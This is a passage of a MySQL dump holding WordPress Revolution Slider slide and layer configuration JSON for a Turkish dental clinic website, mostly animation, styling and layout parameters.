vgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":7,\"positionLeftReset\":90,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"bgimage_url\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}},{\"text\":\"[us_btn text=\\\"Bilgi Al\\\" color=\\\"primary\\\" link=\\\"url:\\/hizmetlerimiz\\/implant|||\\\"]\",\"type\":\"text\",\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":1000,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":1000,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3470,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":3,\"left\":{\"desktop\":21,\"notebook\":24},\"top\":{\"desktop\":309,\"notebook\":310},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"Button 1\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":false,\"mask_end\":false,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":false,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":false,\"resize-full\":false,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":561,\"height\":20,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"16px\",\"notebook\":\"16px\"},\"line-height\":{\"desktop\":\"20px\",\"notebook\":\"20px\"},\"font-weight\":{\"desktop\":\"400\",\"notebook\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\",\"notebook\":\"inherit\"},\"x_start\":\"inherit\",\"y_start\":\"50px\",\"z_start\":\"inherit\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"0\",\"x_rotate_start\":\"inherit\",\"y_rotate_start\":\"inherit\",\"z_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":3,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"autolinebreak\":false,\"displaymode\":true,\"scaleProportional\":false,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":8,\"positionLeftReset\":110,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}}]', '\"\"');
INSERT INTO `zdenl_revslider_slides` (`id`, `slider_id`, `slide_order`, `params`, `layers`, `settings`) VALUES
(5, 1, 4, '{\"background_type\":\"image\",\"image\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/uploads\\/2018\\/07\\/slider-kurum.jpg\",\"title\":\"Slide\",\"state\":\"published\",\"date_from\":\"\",\"date_to\":\"\",\"slide_transition\":[\"parallaxvertical\"],\"0\":\"Remove\",\"slot_amount\":[\"default\"],\"transition_rotation\":[\"0\"],\"transition_duration\":[\"650\"],\"delay\":\"5000\",\"enable_link\":\"false\",\"link_type\":\"regular\",\"link\":\"\",\"link_open_in\":\"same\",\"slide_link\":\"nothing\",\"link_pos\":\"front\",\"slide_thumb\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"slide_bg_color\":\"#E7E7E7\",\"slide_bg_external\":\"\",\"bg_fit\":\"cover\",\"bg_fit_x\":\"100\",\"bg_fit_y\":\"100\",\"bg_repeat\":\"no-repeat\",\"bg_position\":\"center center\",\"bg_position_x\":\"0\",\"bg_position_y\":\"0\",\"kenburn_effect\":\"off\",\"kb_start_fit\":\"100\",\"kb_end_fit\":\"100\",\"bg_end_position\":\"left bottom\",\"kb_duration\":\"6000\",\"kb_easing\":\"Power0.easeIn\",\"rs-gallery-type\":\"gallery\",\"bg_external\":\"\",\"bg_color\":\"#E7E7E7\",\"slide_bg_youtube\":\"\",\"slide_bg_vimeo\":\"\",\"slide_bg_html_mpeg\":\"\",\"slide_bg_html_webm\":\"\",\"slide_bg_html_ogv\":\"\",\"image_source_type\":\"full\",\"alt_option\":\"media_library\",\"alt_attr\":\"\",\"ext_width\":\"1920\",\"ext_height\":\"1080\",\"video_force_cover\":\"on\",\"video_dotted_overlay\":\"none\",\"video_ratio\":\"16:9\",\"video_start_at\":\"\",\"video_end_at\":\"\",\"video_loop\":\"none\",\"video_nextslide\":\"off\",\"video_force_rewind\":\"on\",\"video_mute\":\"on\",\"video_volume\":\"\",\"video_speed\":\"1\",\"video_arguments\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"video_arguments_vim\":\"title=0&byline=0&portrait=0&api=1\",\"kb_start_offset_x\":\"0\",\"kb_end_offset_x\":\"0\",\"kb_start_offset_y\":\"0\",\"kb_end_offset_y\":\"0\",\"kb_start_rotate\":\"0\",\"kb_end_rotate\":\"0\",\"hideslideafter\":\"0\",\"save_performance\":\"off\",\"thumb_dimension\":\"slider\",\"thumb_for_admin\":\"off\",\"transition_ease_in\":[\"default\"],\"transition_ease_out\":[\"default\"],\"params_1\":\"\",\"params_1_chars\":\"10\",\"params_2\":\"\",\"params_2_chars\":\"10\",\"params_3\":\"\",\"params_3_chars\":\"10\",\"params_4\":\"\",\"params_4_chars\":\"10\",\"params_5\":\"\",\"params_5_chars\":\"10\",\"params_6\":\"\",\"params_6_chars\":\"10\",\"params_7\":\"\",\"params_7_chars\":\"10\",\"params_8\":\"\",\"params_8_chars\":\"10\",\"params_9\":\"\",\"params_9_chars\":\"10\",\"params_10\":\"\",\"params_10_chars\":\"10\",\"slide_description\":\"\",\"class_attr\":\"\",\"id_attr\":\"\",\"data_attr\":\"\",\"title_option\":\"media_library\",\"title_attr\":\"\",\"media-filter-type\":\"none\",\"stoponpurpose\":\"false\",\"invisibleslide\":\"false\",\"hideslideonmobile\":\"off\",\"ph-round-tabs-font-family-font_family-slide\":\"off\",\"ph-round-tabs-font-family-font_family\":\"Roboto\",\"ph-round-tabs-border-color-color-rgba-slide\":\"off\",\"ph-round-tabs-border-color-color-rgba\":\"#e5e5e5\",\"ph-round-tabs-border-size-custom-slide\":\"off\",\"ph-round-tabs-border-size-custom\":\"1\",\"ph-round-tabs-image-size-custom-slide\":\"off\",\"ph-round-tabs-image-size-custom\":\"60\",\"ph-round-tabs-param1-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param1-color-color-rgba\":\"rgba(51,51,51,0.5)\",\"ph-round-tabs-param1-size-custom-slide\":\"off\",\"ph-round-tabs-param1-size-custom\":\"12\",\"ph-round-tabs-hover-bg-color-color-rgba-slide\":\"off\",\"ph-round-tabs-hover-bg-color-color-rgba\":\"#eeeeee\",\"ph-round-tabs-bgcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-bgcolor-color-rgba\":\"rgba(0,0,0,0)\",\"ph-round-tabs-contentcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-contentcolor-color-rgba\":\"#333333\",\"ph-round-tabs-param2-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param2-color-color-rgba\":\"transparent\",\"ph-round-tabs-param2-size-custom-slide\":\"off\",\"ph-round-tabs-param2-size-custom\":\"14\",\"ph-round-thumbs-title-bg-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-bg-color-rgba\":\"rgba(0,0,0,0.85)\",\"ph-round-thumbs-title-color-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-color-color-rgba\":\"#ffffff\",\"ph-round-thumbs-title-font-size-custom-slide\":\"off\",\"ph-round-thumbs-title-font-size-custom\":\"12\",\"slide_parallax_level\":\"4\",\"kb_blur_start\":\"0\",\"kb_blur_end\":\"0\",\"image_id\":\"6434\",\"0\":\"Remove\"}', '[{\"static_styles\":{\"font-size\":{\"desktop\":\"\"},\"line-height\":{\"desktop\":\"\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"\"},\"letter-spacing\":{\"desktop\":\"\"}},\"deformation\":{\"background-color\":\"rgba(0,0,0,0.5)\",\"border-color\":\"rgba(0,0,0,0.5)\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-style\":\"solid\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"font-style\":\"normal\",\"text-decoration\":\"none\",\"vertical-align\":\"top\",\"text-transform\":\"none\",\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"overflow\":\"visible\",\"font-family\":\"\"},\"deformation-hover\":{\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"pointer_events\":\"auto\"},\"text\":\" \",\"alias\":\"Shape\",\"type\":\"shape\",\"style\":\"\",\"internal_class\":\"tp-shape tp-shapewrapper\",\"autolinebreak\":false,\"max_width\":{\"desktop\":\"538px\"},\"max_height\":{\"desktop\":\"501px\"},\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":10,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"tp-fade\",\"easing\":\"Power3.easeInOut\",\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"time_relative\":10,\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"\",\"easing\":\"Power3.easeInOut\",\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"time_relative\":4560,\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":{},\"unique_id\":6,\"left\":{\"desktop\":4},\"top\":{\"desktop\":0},\"isDemo\":false,\"hover\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"min_height\":\"40px\",\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"left\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_follow\":\"follow\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":200,\"height\":500,\"cover_mode\":\"custom\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"inherit\",\"y_start\":\"inherit\",\"z_start\":\"inherit\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"0\",\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"x_rotate_start\":\"inherit\",\"y_rotate_start\":\"inherit\",\"z_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":0,\"endWithSlide\":false,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"scaleX\":{\"desktop\":\"\"},\"scaleY\":{\"desktop\":\"\"},\"displaymode\":true,\"scaleProportional\":false,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrTabindex\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"p_uid\":-1,\"zIndex\":5,\"positionLeftReset\":1,\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"addedToStage\":true,\"parallax_layer_ddd_zlevel\":\"front\"},{\"text\":\"Anla\\u015fmal\\u0131\",\"type\":\"text\",\"left\":{\"desktop\":17,\"notebook\":35},\"top\":{\"desktop\":62,\"notebook\":76},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":296,\"height\":60,\"serial\":1,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"700\",\"notebook\":\"700\"},\"font-size\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"line-height\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Limitless\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":2,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"l